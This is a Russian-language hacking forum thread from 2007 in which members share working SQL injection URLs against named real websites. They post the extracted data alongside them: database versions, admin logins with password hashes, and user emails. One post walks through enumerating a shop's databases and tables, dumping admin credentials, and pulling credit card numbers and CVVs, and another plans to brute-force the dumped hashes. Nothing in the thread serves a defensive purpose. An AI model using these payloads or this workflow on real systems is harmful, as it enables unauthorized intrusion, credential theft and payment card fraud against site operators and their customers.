Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.08.2007, 23:06
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
http://www.bt-lady.com.ua/?show_bs=yes&id=-20+union+select+concat_ws(0x3a,version(),database( ),user()),2,3/*
4.0.26-standard:bt-lady:bt-lad
http://www.bt-lady.com.ua/?show_bs=yes&id=-20+union+select+concat_ws(0x3a,username,user_passw ord,user_email),2,3+from+phpbb_users+where+user_le vel=1/*
администратор:32c264cbd961295d
Последний раз редактировалось halkfild; 28.08.2007 в 23:14..
|
|
|
28.08.2007, 23:28
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Не могу подобрать колонку юзеров,хотя пароли мыла нашел  4 мускул
код:
http://svadba.net.ru/info.php?id=-4077'+union+select+1,2,3,concat(email,pass),5,6,7, 8,9+from+users/*
p.s прошу прощения если боян,так как со смарта юзать антибоян неблагодарное дело 
Последний раз редактировалось fobofob; 28.08.2007 в 23:38..
Причина: .
|
|
|
|
28.08.2007, 23:35
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047
Репутация:
930
|
|
Сообщение от fobofob
http://svadba.net.ru/info.php?id=-4077'+union+select+1,2,3,pass,5,6,7,8,9+from+users/*
Попробуй таблу phpbb_users и колонки в ней username и user_password.
Последний раз редактировалось Ksander; 29.08.2007 в 00:16..
|
|
|
|
28.08.2007, 23:57
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
http://svadba.net.ru/info.php?id=-4077'+union+select+1,2,3,concat_ws(0x3a,username,u ser_password,user_email),5,6,7,8,9+from+phpbb_user s/*
много мыл и хешей..
ну и теперь достать пассы с самого сайта это все брутануть по списку и все /*думаю там процентов 50 сбрутится по списку*/
Последний раз редактировалось halkfild; 29.08.2007 в 00:01..
|
|
|
|
29.08.2007, 00:30
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
PR - 5
observatorioviolencia.org
http://www.observatorioviolencia.org/documentos.php?id=-123+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11/*
4.1.22-standard-log  riginb8_webuser@localhost riginb8_observator ioviolencia
з.ы. все таблици на французком.. интересно в какой таблице юзвери.. /*usager, usagers - не подходят(*/
PR - 5
worldrtd.net
http://www.worldrtd.net/news/world/?id=-666+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,concat_ws(0x3a,version(),user (),database())/*'
4.1.15-Debian_1ubuntu5-log:worldrtd@localhost:worldrtddb
Последний раз редактировалось halkfild; 29.08.2007 в 00:44..
|
|
|
|
29.08.2007, 01:44
|
|
Познающий
Регистрация: 13.03.2007
Сообщений: 55
Провел на форуме:
297449
Репутация:
17
|
|
SQL Инъекция проведена Noisia и x.Elf
Сайт: http://mobile.zensis.com/buy.php?pid=-0101'
БД: mYSQL5
Для начала мы нашли базы:
Код:
edu
fengshuima
fotogb_forum
fsm_forum
fungshuima
fungshuima_cart.cart_admin
fungshuimablog
match3g
mobolan
mysql
photo_gallery
test
test_table
yahooj2medemo
zabbix
zensis_test
Потом таблицы:
Код:
cart_address_book
cart_address_format
cart_admin
cart_admin_activity_log
cart_authorizenet
cart_banners
cart_banners_history
cart_categories
cart_categories_description
cart_configuration
cart_configuration_group
cart_counter
cart_counter_history
cart_countries
cart_coupon_email_track
cart_coupon_gv_customer
cart_coupon_gv_queue
cart_coupon_redeem_track
cart_coupon_restrict
cart_coupons
cart_currencies
cart_customers
cart_customers_basket
cart_customers_basket_attributes
cart_customers_info
cart_customers_wishlist
cart_db_cache
cart_email_archive
cart_featured
cart_files_uploaded
cart_geo_zones
cart_get_terms_to_filter
cart_group_pricing
cart_languages
cart_layout_boxes
cart_manufacturers
cart_manufacturers_info
cart_media_clips
cart_media_manager
cart_media_to_products
cart_media_types
cart_meta_tags_products_description
cart_music_genre
cart_newsletters
cart_orders
cart_orders_products
cart_orders_products_attributes
cart_orders_products_download
cart_orders_status
cart_orders_status_history
cart_orders_total
cart_paypal
cart_paypal_payment_status
cart_paypal_payment_status_history
cart_paypal_session
cart_product_music_extra
cart_product_type_layout
cart_product_types
cart_product_types_to_category
cart_products
cart_products_attributes
cart_products_attributes_download
cart_products_description
cart_products_discount_quantity
cart_products_notifications
cart_products_options_types
cart_products_options_values
cart_products_options_values_to_products_options
cart_products_to_categories
cart_project_version
cart_project_version_history
cart_query_builder
cart_record_artists
cart_record_artists_info
cart_record_company
cart_record_company_info
cart_reviews
cart_reviews_description
cart_salemaker_sales
cart_sessions
cart_specials
cart_tax_rates
cart_template_select
cart_upgrade_exceptions
cart_zones
cart_zones_to_geo_zones
Потом колумны:
Код:
birthday
age
grade
placeofbirth
gender
school_info_id
addr1_e
addr2_e
addr3_e
district_s_code
regioncode
student_tel
student_fax
student_email
iq_test
iq_test_date
iq_test_age
iq
fathernamee
fathernamec
fatherphone
fatheroccupation
mothernamee
motherphone
motheroccupation
course_code_1
course_code_2
course_code_3
config_id
type
name
display
value
class
course_info_id
course_code
course_date
name_e
desc_e
desc_c
remark_e
remark_c
districtcode
district_l_e
district_s_id
district_s_c
region_id
region_c
region_e
family_seq
addr_e
addr_c
principal_e
tel
email
user_id
username
password
nickname
adminlevel
blacklist_seq
member_id
heading
blog_seq
remark
content
photopath
status
last_upd_date
family_id
relation
friends_seq
matched_id
score1
score2
scorecombined
dateofbirth
sex
location1
location2
description1
description2
description3
description4
description5
description6
smoking
drinking
vegetarian
height
body
religion
living
night_life
pets_detail
like_pets_detail
maritalstatus
travel_places
education
lived_places
hope_travel_places
job
jobtime
joblocation2
personality1
personality2
personality3
personality4
personality5
personality6
personality7
personality8
personality9
horo
mh_age_s
mh_age_e
mh_sex
mh_location1
mh_location2
mh_location1_weight
mh_body
mh_body_weight
mh_height_s
mh_height_e
mh_height_weight
mh_religion
mobile
operator
Перебираем...
http://www.aboutus.org/ZenSis.com
Смотрим сколько сайтов держит бд...
Код:
http://mobile.zensis.com/buy.php?pid=-0101+union+select+concat(username,0x3a,password)+from+edu.user+limit+1,1/*
Логин пассы от сайта http://www.fotogb.com/
___
нашли инет магазин
https://store.zarinfabrics.com
Оплата через кредитки, держится все на той же БД
Подобрали базу к таблице.. fungshuima_cart.cart_admin
_____
И делаем такой запрос )
http://mobile.zensis.com/buy.php?pid=-0101+union+select+column_name+from+information_sch ema.columns+where+table_name='cart_admin'+limit+3, 1/*
теперь
http://mobile.zensis.com/buy.php?pid=-0101+union+select+concat(admin_name,0x21,admin_pas s,0x21,admin_email,0x21,admin_level)+from+fungshui ma_cart.cart_admin/*
___
Подбираем данные, и лезим в кредитки шопа
http://mobile.zensis.com/buy.php?pid=-0101+union+select+concat(cc_type,0x3a,0x3a,cc_owne r,0x3a,0x3a,cc_number,0x3a,0x3a,cc_expires,0x3a,0x 3a,cc_cvv,0x3a,0x3a)+from+fungshuima_cart.cart_ord ers+limit+1,1/*
но в конце большой облом, КРЕДИТКА ВСЕГО ОДНА.
Зато много опыта, и чужая просроченая кредитка )
|
|
|
|
29.08.2007, 01:46
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515
Репутация:
29
|
|
и убили время |
|
|
|
29.08.2007, 03:50
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Покопался, ничё не нащёл, выбрасывать жалко, может комунить и пригодится
_http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,1 3/* |
|
|
|
29.08.2007, 06:53
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
Сообщение от halkfild
4.0.26-standard:bt-lady:bt-lad
администратор:32c264cbd961295d
в общем не знаю как на реагируют на доработку чужих инъекций (один раз какой то агро попался -)) о.О или тут так принято?)
но все же решил добавить чуть побольше информации...
http://www.bt-lady.com.ua/?show_bs=yes&id=-20+union+select+concat_ws(0x3a,username,user_passw ord,user_email),user(),user_password+from+phpbb_us ers+where+user_level=1/*
администратор:32c264cbd961295d
bt-lady@localhost
32c264cbd961295d38f038b560128362
_____
попробовал зайти на фтп (не загрузилось. в админку тоже не пускает с такими данными)
_____
Michelle:d650735de450759a3a801
bt-lady@localhost
d650735de450759a3a801c4174469d2f
Последний раз редактировалось Calcutta; 29.08.2007 в 06:57..
|
|
|
|
29.08.2007, 11:09
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
этой записи нет в антибояне я листать 300 страниц нет особого желания..
з.ы. к админам, модерам и тд.. давайте сделаем скрипт который позволит каждому добавлять его скулю.. это исключит такие ситуации.. заодно в добавлении сделать проверки есть ли этот скуль и тогда будет такой порядок действий:
1 добавил/проверил в антибоян..
2 запостил на форуме
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
